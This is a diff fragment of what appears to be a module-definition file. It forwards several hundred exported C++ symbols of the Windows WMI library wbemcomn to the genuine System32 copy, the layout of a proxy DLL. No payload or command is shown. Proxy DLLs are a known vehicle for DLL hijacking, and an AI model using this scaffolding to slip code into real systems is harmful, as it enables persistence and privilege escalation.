+    ?GetStringPointerByRef@WString2@@QEBAAEBQEBGXZ=C:/Windows/System32/wbemcomn.?GetStringPointerByRef@WString2@@QEBAAEBQEBGXZ @836
+    ?GetStringPointerByRef@WString@@QEBAAEBQEBGXZ=C:/Windows/System32/wbemcomn.?GetStringPointerByRef@WString@@QEBAAEBQEBGXZ @837
+    ?GetText@CPropertyName@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?GetText@CPropertyName@@QEAAPEAGXZ @838
+    ?GetText@CVar@@QEAAPEAGJJPEBG@Z=C:/Windows/System32/wbemcomn.?GetText@CVar@@QEAAPEAGJJPEBG@Z @839
+    ?GetText@CVarVector@@QEAAPEAGJJ@Z=C:/Windows/System32/wbemcomn.?GetText@CVarVector@@QEAAPEAGJJ@Z @840
+    ?GetText@QL_LEVEL_1_RPN_EXPRESSION@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?GetText@QL_LEVEL_1_RPN_EXPRESSION@@QEAAPEAGXZ @841
+    ?GetText@QL_LEVEL_1_TOKEN@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?GetText@QL_LEVEL_1_TOKEN@@QEAAPEAGXZ @842
+    ?GetTextSid@CNtSid@@QEAAHPEAGPEAK@Z=C:/Windows/System32/wbemcomn.?GetTextSid@CNtSid@@QEAAHPEAGPEAK@Z @843
+    ?GetTextSid@CNtSid@@QEAAJPEAPEAG@Z=C:/Windows/System32/wbemcomn.?GetTextSid@CNtSid@@QEAAJPEAPEAG@Z @844
+    ?GetTickCount@CWbemTime@@SA?AV1@XZ=C:/Windows/System32/wbemcomn.?GetTickCount@CWbemTime@@SA?AV1@XZ @845
+    ?GetTlsIndex@CExecQueue@@SAKXZ=C:/Windows/System32/wbemcomn.?GetTlsIndex@CExecQueue@@SAKXZ @846
+    ?GetToken@CWbemCallSecurity@@UEAAPEAXXZ=C:/Windows/System32/wbemcomn.?GetToken@CWbemCallSecurity@@UEAAPEAXXZ @847
+    ?GetTraceLevel@CWMITraceSettings@@QEAAEXZ=C:/Windows/System32/wbemcomn.?GetTraceLevel@CWMITraceSettings@@QEAAEXZ @848
+    ?GetType@C9XAce@@UEAAHXZ=C:/Windows/System32/wbemcomn.?GetType@C9XAce@@UEAAHXZ @849
+    ?GetType@CExecQueue@@UEAAPEBGXZ=C:/Windows/System32/wbemcomn.?GetType@CExecQueue@@UEAAPEBGXZ @850
+    ?GetType@CNtAce@@UEAAHXZ=C:/Windows/System32/wbemcomn.?GetType@CNtAce@@UEAAHXZ @851
+    ?GetType@CSafeArray@@QEAAHXZ=C:/Windows/System32/wbemcomn.?GetType@CSafeArray@@QEAAHXZ @852
+    ?GetType@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?GetType@CVar@@QEAAHXZ @853
+    ?GetType@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?GetType@CVarVector@@QEAAHXZ @854
+    ?GetType@Registry@@QEAAHPEBGPEAK@Z=C:/Windows/System32/wbemcomn.?GetType@Registry@@QEAAHPEBGPEAK@Z @855
+    ?GetTypeText@CVar@@QEAAPEAGXZ=C:/Windows/System32/wbemcomn.?GetTypeText@CVar@@QEAAPEAGXZ @856
+    ?GetUTC@CDateTimeParser@@QEAAHXZ=C:/Windows/System32/wbemcomn.?GetUTC@CDateTimeParser@@QEAAHXZ @857
+    ?GetUnknown@CUnk@@QEAAPEAUIUnknown@@XZ=C:/Windows/System32/wbemcomn.?GetUnknown@CUnk@@QEAAPEAUIUnknown@@XZ @858
+    ?GetUnknown@CUnkInternal@@QEAAPEAUIUnknown@@XZ=C:/Windows/System32/wbemcomn.?GetUnknown@CUnkInternal@@QEAAPEAUIUnknown@@XZ @859
+    ?GetUnknown@CVar@@QEAAPEAUIUnknown@@XZ=C:/Windows/System32/wbemcomn.?GetUnknown@CVar@@QEAAPEAUIUnknown@@XZ @860
+    ?GetUnknownAt@CSafeArray@@QEAAPEAUIUnknown@@H@Z=C:/Windows/System32/wbemcomn.?GetUnknownAt@CSafeArray@@QEAAPEAUIUnknown@@H@Z @861
+    ?GetValue@CDMTFParser@@QEAAHH@Z=C:/Windows/System32/wbemcomn.?GetValue@CDMTFParser@@QEAAHH@Z @862
+    ?GetVarVector@CVar@@QEAAPEAVCVarVector@@XZ=C:/Windows/System32/wbemcomn.?GetVarVector@CVar@@QEAAPEAVCVarVector@@XZ @863
+    ?GetVariantAt@CSafeArray@@QEAA?AUtagVARIANT@@H@Z=C:/Windows/System32/wbemcomn.?GetVariantAt@CSafeArray@@QEAA?AUtagVARIANT@@H@Z @864
+    ?GetWhenDoneHandle@CExecRequest@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?GetWhenDoneHandle@CExecRequest@@QEAAPEAXXZ @867
+    ?GetWord@CVar@@QEAAGXZ=C:/Windows/System32/wbemcomn.?GetWord@CVar@@QEAAGXZ @868
+    ?GetYear@CDateTimeParser@@QEAAIXZ=C:/Windows/System32/wbemcomn.?GetYear@CDateTimeParser@@QEAAIXZ @869
+    ?GetZero@CWbemTime@@SA?AV1@XZ=C:/Windows/System32/wbemcomn.?GetZero@CWbemTime@@SA?AV1@XZ @870
+    ?Grow@CFlexQueue@@IEAA_NXZ=C:/Windows/System32/wbemcomn.?Grow@CFlexQueue@@IEAA_NXZ @872
+    ?Grow@CSmallArrayBlob@@IEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?Grow@CSmallArrayBlob@@IEAAPEAV1@XZ @873
+    ?Halt@CHaltable@@QEAAJXZ=C:/Windows/System32/wbemcomn.?Halt@CHaltable@@QEAAJXZ @874
+    ?HandleEmbeddedObjectProperties@CTextTemplate@@AEAAPEAGPEAGPEAUIWbemClassObject@@@Z=C:/Windows/System32/wbemcomn.?HandleEmbeddedObjectProperties@CTextTemplate@@AEAAPEAGPEAGPEAUIWbemClassObject@@@Z @875
+    ?HasChildren@CClientOpsNode@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?HasChildren@CClientOpsNode@@QEAA_NXZ @876
+    ?HasOwner@CNtSecurityDescriptor@@QEAAHXZ=C:/Windows/System32/wbemcomn.?HasOwner@CNtSecurityDescriptor@@QEAAHXZ @877
+    ?HasToBeEnabled@CTraceSessionControl@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?HasToBeEnabled@CTraceSessionControl@@QEAA_NXZ @878
+    ?ImpersonateClient@CWbemCallSecurity@@UEAAJXZ=C:/Windows/System32/wbemcomn.?ImpersonateClient@CWbemCallSecurity@@UEAAJXZ @879
+    ?InOrder@CQl1ParseSink@@UEAAXJ@Z=C:/Windows/System32/wbemcomn.?InOrder@CQl1ParseSink@@UEAAXJ@Z @880
+    ?IncrementIndex@CFlexQueue@@IEAAXAEAH@Z=C:/Windows/System32/wbemcomn.?IncrementIndex@CFlexQueue@@IEAAXAEAH@Z @881
+    ?Init@CPropertyName@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Init@CPropertyName@@QEAAXXZ @882
+    ?Init@CPublishWMIOperationEvent@@SAJXZ=C:/Windows/System32/wbemcomn.?Init@CPublishWMIOperationEvent@@SAJXZ @883
+    ?Init@CVar@@AEAAXXZ=C:/Windows/System32/wbemcomn.?Init@CVar@@AEAAXXZ @884
+    ?InitMap@CWbemInstallObject@@SAXXZ=C:/Windows/System32/wbemcomn.?InitMap@CWbemInstallObject@@SAXXZ @885
+    ?InitTls@CExecQueue@@KAXXZ=C:/Windows/System32/wbemcomn.?InitTls@CExecQueue@@KAXXZ @886
+    ?InitToken@CAbstractQl1Parser@@KAXPEAU_tag_WbemQl1Token@@@Z=C:/Windows/System32/wbemcomn.?InitToken@CAbstractQl1Parser@@KAXPEAU_tag_WbemQl1Token@@@Z @887
+    ?Initialize@CMUILocaleList@@QEAAJPEAG_N@Z=C:/Windows/System32/wbemcomn.?Initialize@CMUILocaleList@@QEAAJPEAG_N@Z @888
+    ?Initialize@CSmallArrayBlob@@IEAAXH@Z=C:/Windows/System32/wbemcomn.?Initialize@CSmallArrayBlob@@IEAAXH@Z @889
+    ?Initialize@CTraceSessionControl@@QEAAKPEBG@Z=C:/Windows/System32/wbemcomn.?Initialize@CTraceSessionControl@@QEAAKPEBG@Z @890
+    ?Initialize@CUnk@@UEAAHXZ=C:/Windows/System32/wbemcomn.?Initialize@CUnk@@UEAAHXZ @891
+    ?InitializeThread@CExecQueue@@MEAAJXZ=C:/Windows/System32/wbemcomn.?InitializeThread@CExecQueue@@MEAAJXZ @892
+    ?Insert@CClientOpsNode@@AEAAXPEAV1@@Z=C:/Windows/System32/wbemcomn.?Insert@CClientOpsNode@@AEAAXPEAV1@@Z @893
+    ?InsertAt@CFlexArray@@QEAAHHPEAX@Z=C:/Windows/System32/wbemcomn.?InsertAt@CFlexArray@@QEAAHHPEAX@Z @894
+    ?InsertAt@CSmallArrayBlob@@QEAAPEAV1@HPEAX@Z=C:/Windows/System32/wbemcomn.?InsertAt@CSmallArrayBlob@@QEAAPEAV1@HPEAX@Z @895
+    ?InsertAt@CVarVector@@QEAAHHAEAVCVar@@@Z=C:/Windows/System32/wbemcomn.?InsertAt@CVarVector@@QEAAHHAEAVCVar@@@Z @896
+    ?InsertAt@CWStringArray@@QEAAHHPEBG@Z=C:/Windows/System32/wbemcomn.?InsertAt@CWStringArray@@QEAAHHPEBG@Z @897
+    ?InternalAddRef@CUnkInternal@@QEAAKXZ=C:/Windows/System32/wbemcomn.?InternalAddRef@CUnkInternal@@QEAAKXZ @898
+    ?InternalQueryInterface@CUnkInternal@@QEAAJAEBU_GUID@@PEAPEAX@Z=C:/Windows/System32/wbemcomn.?InternalQueryInterface@CUnkInternal@@QEAAJAEBU_GUID@@PEAPEAX@Z @899
+    ?InternalRawArrayAccess@CVarVector@@QEAAJXZ=C:/Windows/System32/wbemcomn.?InternalRawArrayAccess@CVarVector@@QEAAJXZ @900
+    ?InternalRelease@CUnkInternal@@QEAAKXZ=C:/Windows/System32/wbemcomn.?InternalRelease@CUnkInternal@@QEAAKXZ @901
+    ?Intersection@CWStringArray@@SAXAEAV1@00@Z=C:/Windows/System32/wbemcomn.?Intersection@CWStringArray@@SAXAEAV1@00@Z @902
+    ?IsAppropriateThread@CExecQueue@@MEAAHXZ=C:/Windows/System32/wbemcomn.?IsAppropriateThread@CExecQueue@@MEAAHXZ @904
+    ?IsDataNull@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsDataNull@CVar@@QEAAHXZ @905
+    ?IsEmbeddedObjectProperty@CTextTemplate@@AEAAHPEAG@Z=C:/Windows/System32/wbemcomn.?IsEmbeddedObjectProperty@CTextTemplate@@AEAAHPEAG@Z @906
+    ?IsEmpty@CInsertionString@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsEmpty@CInsertionString@@QEAAHXZ @907
+    ?IsEmpty@CInstructionQueue@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsEmpty@CInstructionQueue@@QEAAHXZ @908
+    ?IsEnabled@CTraceSessionControl@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?IsEnabled@CTraceSessionControl@@QEAA_NXZ @909
+    ?IsEntered@CCheckedInCritSec@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsEntered@CCheckedInCritSec@@QEAAHXZ @910
+    ?IsEntered@CEnterWbemCriticalSection@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsEntered@CEnterWbemCriticalSection@@QEAAHXZ @911
+    ?IsEventEnabled@CPublishWMIOperationEvent@@SAJAEBU_EVENT_DESCRIPTOR@@@Z=C:/Windows/System32/wbemcomn.?IsEventEnabled@CPublishWMIOperationEvent@@SAJAEBU_EVENT_DESCRIPTOR@@@Z @912
+    ?IsFinite@CWbemInterval@@QEBAHXZ=C:/Windows/System32/wbemcomn.?IsFinite@CWbemInterval@@QEBAHXZ @913
+    ?IsFinite@CWbemTime@@QEBAHXZ=C:/Windows/System32/wbemcomn.?IsFinite@CWbemTime@@QEBAHXZ @914
+    ?IsHalted@CHaltable@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsHalted@CHaltable@@QEAAHXZ @915
+    ?IsIdleTooLong@CExecQueue@@MEAAHPEAVCThreadRecord@1@K@Z=C:/Windows/System32/wbemcomn.?IsIdleTooLong@CExecQueue@@MEAAHPEAVCThreadRecord@1@K@Z @916
+    ?IsImpersonating@CWbemCallSecurity@@UEAAHXZ=C:/Windows/System32/wbemcomn.?IsImpersonating@CWbemCallSecurity@@UEAAHXZ @917
+    ?IsInitialized@CWbemInstallObject@@CA_NXZ=C:/Windows/System32/wbemcomn.?IsInitialized@CWbemInstallObject@@CA_NXZ @919
+    ?IsInterval@CDMTFParser@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?IsInterval@CDMTFParser@@QEAA_NXZ @920
+    ?IsNull@CVar@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsNull@CVar@@QEAAHXZ @926
+    ?IsOffline@CWbemInstallObject@@SA_NXZ=C:/Windows/System32/wbemcomn.?IsOffline@CWbemInstallObject@@SA_NXZ @927
+    ?IsOk@CExecRequest@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?IsOk@CExecRequest@@QEAA_NXZ @928
+    ?IsOptimized@CVarVector@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsOptimized@CVarVector@@QEAAHXZ @929
+    ?IsSTA@CExecQueue@@MEAAHXZ=C:/Windows/System32/wbemcomn.?IsSTA@CExecQueue@@MEAAHXZ @931
+    ?IsSTAThread@CExecQueue@@SAHXZ=C:/Windows/System32/wbemcomn.?IsSTAThread@CExecQueue@@SAHXZ @932
+    ?IsSuitableThread@CExecQueue@@MEAAHPEAVCThreadRecord@1@PEAVCExecRequest@@@Z=C:/Windows/System32/wbemcomn.?IsSuitableThread@CExecQueue@@MEAAHPEAVCThreadRecord@1@PEAVCExecRequest@@@Z @933
+    ?IsUsed@CDMTFParser@@QEAA_NH@Z=C:/Windows/System32/wbemcomn.?IsUsed@CDMTFParser@@QEAA_NH@Z @934
+    ?IsUser@CNtSid@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?IsUser@CNtSid@@QEAA_NXZ @935
+    ?IsUserInGroup@CNtSecurity@@SAHPEAXAEAVCNtSid@@PEAH@Z=C:/Windows/System32/wbemcomn.?IsUserInGroup@CNtSecurity@@SAHPEAXAEAVCNtSid@@PEAH@Z @936
+    ?IsValid@CDMTFParser@@QEAA_NXZ=C:/Windows/System32/wbemcomn.?IsValid@CDMTFParser@@QEAA_NXZ @937
+    ?IsValid@CNtAcl@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsValid@CNtAcl@@QEAAHXZ @938
+    ?IsValid@CNtSecurityDescriptor@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsValid@CNtSecurityDescriptor@@QEAAHXZ @939
+    ?IsValid@CNtSid@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsValid@CNtSid@@QEAAHXZ @940
+    ?IsValidAmPmString@CDateTimeParser@@IEAAHPEAGPEBGQEAPEAG@Z=C:/Windows/System32/wbemcomn.?IsValidAmPmString@CDateTimeParser@@IEAAHPEAGPEBGQEAPEAG@Z @941
+    ?IsValidColonMillisecond@CDateTimeParser@@IEAAHPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?IsValidColonMillisecond@CDateTimeParser@@IEAAHPEAGPEBG@Z @942
+    ?IsValidDateTime@CDateTimeParser@@QEAAHXZ=C:/Windows/System32/wbemcomn.?IsValidDateTime@CDateTimeParser@@QEAAHXZ @943
+    ?IsValidDayNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?IsValidDayNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z @944
+    ?IsValidDotMillisecond@CDateTimeParser@@IEAAHPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?IsValidDotMillisecond@CDateTimeParser@@IEAAHPEAGPEBG@Z @945
+    ?IsValidHourNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?IsValidHourNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z @948
+    ?IsValidMinuteNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?IsValidMinuteNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z @949
+    ?IsValidMonthNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?IsValidMonthNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z @950
+    ?IsValidMonthString@CDateTimeParser@@IEAAHPEAGPEBGQEAPEAG2@Z=C:/Windows/System32/wbemcomn.?IsValidMonthString@CDateTimeParser@@IEAAHPEAGPEBGQEAPEAG2@Z @951
+    ?IsValidSecondNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z=C:/Windows/System32/wbemcomn.?IsValidSecondNumber@CDateTimeParser@@IEAAHPEAGPEBG@Z @952
+    ?IsValidVectorArray@CVarVector@@SAHHPEAUtagSAFEARRAY@@@Z=C:/Windows/System32/wbemcomn.?IsValidVectorArray@CVarVector@@SAHHPEAUtagSAFEARRAY@@@Z @953
+    ?IsValidVectorType@CVarVector@@SAHH@Z=C:/Windows/System32/wbemcomn.?IsValidVectorType@CVarVector@@SAHH@Z @954
+    ?IsValidYearMonthDayNumber@CDateTimeParser@@IEAAHPEAG@Z=C:/Windows/System32/wbemcomn.?IsValidYearMonthDayNumber@CDateTimeParser@@IEAAHPEAG@Z @955
+    ?IsValidYearNumber@CDateTimeParser@@IEAAHPEAGPEBGH@Z=C:/Windows/System32/wbemcomn.?IsValidYearNumber@CDateTimeParser@@IEAAHPEAGPEBGH@Z @956
+    ?IsWildcard@CDMTFParser@@QEAA_NH@Z=C:/Windows/System32/wbemcomn.?IsWildcard@CDMTFParser@@QEAA_NH@Z @958
+    ?IsZero@CWbemInterval@@QEBAHXZ=C:/Windows/System32/wbemcomn.?IsZero@CWbemInterval@@QEBAHXZ @959
+    ?IsZero@CWbemTime@@QEBAHXZ=C:/Windows/System32/wbemcomn.?IsZero@CWbemTime@@QEBAHXZ @960
+    ?LCID_To_Culture_Format@CMUILocale@@SAJKPEAG_K@Z=C:/Windows/System32/wbemcomn.?LCID_To_Culture_Format@CMUILocale@@SAJKPEAG_K@Z @961
+    ?LCID_To_ms_XXX_Format@CMUILocale@@SAJKPEAG_K@Z=C:/Windows/System32/wbemcomn.?LCID_To_ms_XXX_Format@CMUILocale@@SAJKPEAG_K@Z @962
+    ?Leave@CCheckedInCritSec@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Leave@CCheckedInCritSec@@QEAAXXZ @963
+    ?Leave@CCritSec@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Leave@CCritSec@@QEAAXXZ @964
+    ?Leave@CExecQueue@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Leave@CExecQueue@@QEAAXXZ @965
+    ?Leave@CStaticCritSec@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Leave@CStaticCritSec@@QEAAXXZ @966
+    ?Leave@CWbemCriticalSection@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Leave@CWbemCriticalSection@@QEAAXXZ @967
+    ?Length@WString2@@QEBAHXZ=C:/Windows/System32/wbemcomn.?Length@WString2@@QEBAHXZ @968
+    ?Length@WString@@QEBAHXZ=C:/Windows/System32/wbemcomn.?Length@WString@@QEBAHXZ @969
+    ?LocaleName_To_LCID@CMUILocale@@SAJPEBGPEA_NPEAK@Z=C:/Windows/System32/wbemcomn.?LocaleName_To_LCID@CMUILocale@@SAJPEBGPEA_NPEAK@Z @970
+    ?Lock@?$CLockableFlexArray@VCStaticCritSec@@@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Lock@?$CLockableFlexArray@VCStaticCritSec@@@@QEAAXXZ @971
+    ?Lock@CClientOpsNode@@QEAAXXZ=C:/Windows/System32/wbemcomn.?Lock@CClientOpsNode@@QEAAXXZ @972
+    ?LockRegion@CBuffer@@UEAAJT_ULARGE_INTEGER@@0K@Z=C:/Windows/System32/wbemcomn.?LockRegion@CBuffer@@UEAAJT_ULARGE_INTEGER@@0K@Z @973
+    ?LogError@CExecQueue@@MEAAXPEAVCExecRequest@@H@Z=C:/Windows/System32/wbemcomn.?LogError@CExecQueue@@MEAAXPEAVCExecRequest@@H@Z @974
+    ?MakeInternalCopyOfThread@CWbemCallSecurity@@SAPEAV1@XZ=C:/Windows/System32/wbemcomn.?MakeInternalCopyOfThread@CWbemCallSecurity@@SAPEAV1@XZ @976
+    ?MakeOptimized@CVarVector@@QEAAHHHH@Z=C:/Windows/System32/wbemcomn.?MakeOptimized@CVarVector@@QEAAHHHH@Z @977
+    ?MarkForRemoval@CTimerInstruction@@UEAAJXZ=C:/Windows/System32/wbemcomn.?MarkForRemoval@CTimerInstruction@@UEAAJXZ @978
+    ?Match@CLike@@QEAA_NPEBG@Z=C:/Windows/System32/wbemcomn.?Match@CLike@@QEAA_NPEBG@Z @979
+    ?MatchSet@CLike@@IEAA_NPEBG0AEAH@Z=C:/Windows/System32/wbemcomn.?MatchSet@CLike@@IEAA_NPEBG0AEAH@Z @980
+    ?MoveToSubkey@Registry@@QEAAHPEBG@Z=C:/Windows/System32/wbemcomn.?MoveToSubkey@Registry@@QEAAHPEBG@Z @981
+    ?Mrci1Decompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z=C:/Windows/System32/wbemcomn.?Mrci1Decompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z @982
+    ?Mrci1MaxCompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z=C:/Windows/System32/wbemcomn.?Mrci1MaxCompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z @983
+    ?Mrci2Decompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z=C:/Windows/System32/wbemcomn.?Mrci2Decompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z @984
+    ?Mrci2MaxCompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z=C:/Windows/System32/wbemcomn.?Mrci2MaxCompress@CBaseMrciCompression@@QEAAIPEAEI0I@Z @985
+    ?Next@CAbstractQl1Parser@@MEAAHH@Z=C:/Windows/System32/wbemcomn.?Next@CAbstractQl1Parser@@MEAAHH@Z @986
+    ?Next@CWQLScanner@@AEAAHXZ=C:/Windows/System32/wbemcomn.?Next@CWQLScanner@@AEAAHXZ @987
+    ?NotifyStartingThread@CTimerGenerator@@MEAAXXZ=C:/Windows/System32/wbemcomn.?NotifyStartingThread@CTimerGenerator@@MEAAXXZ @989
+    ?NotifyStoppingThread@CTimerGenerator@@MEAAXXZ=C:/Windows/System32/wbemcomn.?NotifyStoppingThread@CTimerGenerator@@MEAAXXZ @990
+    ?ObjectCreated@CContainerControl@@UEAAHPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?ObjectCreated@CContainerControl@@UEAAHPEAUIUnknown@@@Z @991
+    ?ObjectDestroyed@CContainerControl@@UEAAXPEAUIUnknown@@@Z=C:/Windows/System32/wbemcomn.?ObjectDestroyed@CContainerControl@@UEAAXPEAUIUnknown@@@Z @992
+    ?OnInitialize@CUnk@@UEAAHXZ=C:/Windows/System32/wbemcomn.?OnInitialize@CUnk@@UEAAHXZ @993
+    ?Open@CEventLog@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Open@CEventLog@@QEAAHXZ @994
+    ?Open@Registry@@QEAAHPEAUHKEY__@@PEBGK@Z=C:/Windows/System32/wbemcomn.?Open@Registry@@QEAAHPEAUHKEY__@@PEBGK@Z @995
+    ?OrderAces@CNtAcl@@QEAAPEAV1@XZ=C:/Windows/System32/wbemcomn.?OrderAces@CNtAcl@@QEAAPEAV1@XZ @996
+    ?Parse@CAbstractQl1Parser@@QEAAHPEAVCQl1ParseSink@@H@Z=C:/Windows/System32/wbemcomn.?Parse@CAbstractQl1Parser@@QEAAHPEAVCQl1ParseSink@@H@Z @997
+    ?Parse@CWQLScanner@@QEAAHXZ=C:/Windows/System32/wbemcomn.?Parse@CWQLScanner@@QEAAHXZ @998
+    ?Parse@QL1_Parser@@QEAAHPEAPEAUQL_LEVEL_1_RPN_EXPRESSION@@@Z=C:/Windows/System32/wbemcomn.?Parse@QL1_Parser@@QEAAHPEAPEAUQL_LEVEL_1_RPN_EXPRESSION@@@Z @999
+    ?ParseAbsolute@CDMTFParser@@IEAAXPEBG@Z=C:/Windows/System32/wbemcomn.?ParseAbsolute@CDMTFParser@@IEAAXPEBG@Z @1000
+    ?ParseDate@CDMTFParser@@IEAAXPEBG@Z=C:/Windows/System32/wbemcomn.?ParseDate@CDMTFParser@@IEAAXPEBG@Z @1001
+    ?ParseInterval@CDMTFParser@@IEAAXPEBG@Z=C:/Windows/System32/wbemcomn.?ParseInterval@CDMTFParser@@IEAAXPEBG@Z @1002
+    ?ParsePart@CDMTFParser@@IEAAHPEBGHHPEAHHH@Z=C:/Windows/System32/wbemcomn.?ParsePart@CDMTFParser@@IEAAHPEBGHHPEAHHH@Z @1003
+    ?Peek@CFlexQueue@@QEAAPEAXXZ=C:/Windows/System32/wbemcomn.?Peek@CFlexQueue@@QEAAPEAXXZ @1004
+    ?ProcessArray@CTextTemplate@@AEAAPEAGAEBUtagVARIANT@@PEAG@Z=C:/Windows/System32/wbemcomn.?ProcessArray@CTextTemplate@@AEAAPEAGAEBUtagVARIANT@@PEAG@Z @1005
+    ?Publish@CPublishWMIOperationEvent@@SAJPEAGKK0000K_K0H@Z=C:/Windows/System32/wbemcomn.?Publish@CPublishWMIOperationEvent@@SAJPEAGKK0000K_K0H@Z @1006
+    ?PublishClientRequestFailure@CPublishWMIOperationEvent@@SAJPEBGPEAG1K10J0@Z=C:/Windows/System32/wbemcomn.?PublishClientRequestFailure@CPublishWMIOperationEvent@@SAJPEBGPEAG1K10J0@Z @1007
+    ?PublishESSDrop@CPublishWMIOperationEvent@@SAJPEAG0@Z=C:/Windows/System32/wbemcomn.?PublishESSDrop@CPublishWMIOperationEvent@@SAJPEAG0@Z @1008
+    ?PublishEssStarted@CPublishWMIOperationEvent@@SAJPEAG00K0K0@Z=C:/Windows/System32/wbemcomn.?PublishEssStarted@CPublishWMIOperationEvent@@SAJPEAG00K0K0@Z @1009
+    ?PublishEssToConsumer@CPublishWMIOperationEvent@@SAJPEAG0@Z=C:/Windows/System32/wbemcomn.?PublishEssToConsumer@CPublishWMIOperationEvent@@SAJPEAG0@Z @1010
+    ?PublishEssToConsumerBinding@CPublishWMIOperationEvent@@SAJPEAG000@Z=C:/Windows/System32/wbemcomn.?PublishEssToConsumerBinding@CPublishWMIOperationEvent@@SAJPEAG000@Z @1011
+    ?PublishMethodExec@CPublishWMIOperationEvent@@SAJPEAGKK000000K_K0H@Z=C:/Windows/System32/wbemcomn.?PublishMethodExec@CPublishWMIOperationEvent@@SAJPEAGKK000000K_K0H@Z @1012
+    ?PublishProviderInfo@CPublishWMIOperationEvent@@SAJKPEAGK000PEAUIWbemContext@@@Z=C:/Windows/System32/wbemcomn.?PublishProviderInfo@CPublishWMIOperationEvent@@SAJKPEAGK000PEAUIWbemContext@@@Z @1013
+    ?PublishProviderStarted@CPublishWMIOperationEvent@@SAJPEAGJ0K0@Z=C:/Windows/System32/wbemcomn.?PublishProviderStarted@CPublishWMIOperationEvent@@SAJPEAGJ0K0@Z @1014
+    ?PublishRepDelete@CPublishWMIOperationEvent@@SAJKPEAGPEAUIWbemContext@@K0_KH@Z=C:/Windows/System32/wbemcomn.?PublishRepDelete@CPublishWMIOperationEvent@@SAJKPEAGPEAUIWbemContext@@K0_KH@Z @1015
+    ?PublishRepUpdate@CPublishWMIOperationEvent@@SAJKPEAGKPEAUIWbemContext@@K0_KH@Z=C:/Windows/System32/wbemcomn.?PublishRepUpdate@CPublishWMIOperationEvent@@SAJKPEAGKPEAUIWbemContext@@K0_KH@Z @1016
+    ?PublishStop@CPublishWMIOperationEvent@@SAJKJPEAG@Z=C:/Windows/System32/wbemcomn.?PublishStop@CPublishWMIOperationEvent@@SAJKJPEAG@Z @1017
+    ?PublishTemporaryEssStarted@CPublishWMIOperationEvent@@SAJPEAG00K00@Z=C:/Windows/System32/wbemcomn.?PublishTemporaryEssStarted@CPublishWMIOperationEvent@@SAJPEAG00K00@Z @1018
+    ?PublishWin32ProcessCreation@CPublishWMIOperationEvent@@SAJPEAGKK0K_K000K1H@Z=C:/Windows/System32/wbemcomn.?PublishWin32ProcessCreation@CPublishWMIOperationEvent@@SAJPEAGKK0K_K000K1H@Z @1019
+    ?Pushback@CWQLScanner@@AEAAHPEAUWSLexToken@@@Z=C:/Windows/System32/wbemcomn.?Pushback@CWQLScanner@@AEAAHPEAUWSLexToken@@@Z @1020
+    ?Query@CTraceSessionControl@@SAK_KPEAGPEAPEAVCWMITraceSettings@@@Z=C:/Windows/System32/wbemcomn.?Query@CTraceSessionControl@@SAK_KPEAGPEAPEAVCWMITraceSettings@@@Z @1021
+    ?QueryBlanket@CWbemCallSecurity@@UEAAJPEAK0PEAPEAG00PEAPEAX0@Z=C:/Windows/System32/wbemcomn.?QueryBlanket@CWbemCallSecurity@@UEAAJPEAK0PEAPEAG00PEAPEAX0@Z @1022
+    ?QueryInterface@CBuffer@@UEAAJAEBU_GUID@@PEAPEAX@Z=C:/Windows/System32/wbemcomn.?QueryInterface@CBuffer@@UEAAJAEBU_GUID@@PEAPEAX@Z @1023
+    ?QueryInterface@CUnk@@UEAAJAEBU_GUID@@PEAPEAX@Z=C:/Windows/System32/wbemcomn.?QueryInterface@CUnk@@UEAAJAEBU_GUID@@PEAPEAX@Z @1024
